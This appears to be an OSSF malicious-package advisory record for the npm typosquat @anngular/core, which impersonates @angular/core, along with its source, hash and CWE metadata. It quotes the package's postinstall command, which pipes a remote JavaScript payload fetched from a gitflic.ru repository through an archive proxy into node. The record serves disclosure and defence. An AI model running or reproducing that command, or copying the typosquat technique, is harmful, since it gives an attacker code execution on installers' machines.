-= Per source details. Do not edit below this line.=-
Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. On npm install, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020993",
"import_time": "2026-10-05T03:57:37.277322549Z",
"modified_time": "2026-10-05T03:32:14Z",
"sha256": "93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027",
"source": "amazon-inspector",
"versions": [
"22.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "72d94115b368cf5d89f4ccff42cdc4242c179ad180ba91974166399c747f5b21",
"tlsh": "b9513724e4f48d6323df6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"
}
],
"package_integrity": [
{
"filename": "core-22.2.1.tgz",
"hashes": {
"sha1": "c19de0bbea0e677e03b2dc5950fa968bf3391a10",
"sha512_sri": "sha512-J4xcySzh+4IQ9lydzRFAAeWuAUxhA+GbjHqFXLJAjrWN0n8mVHNpW5ZdPLC5zgro6OKMPTWJvR2WwZjieOOE1g=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anngular/core/MAL-2026-17540.json"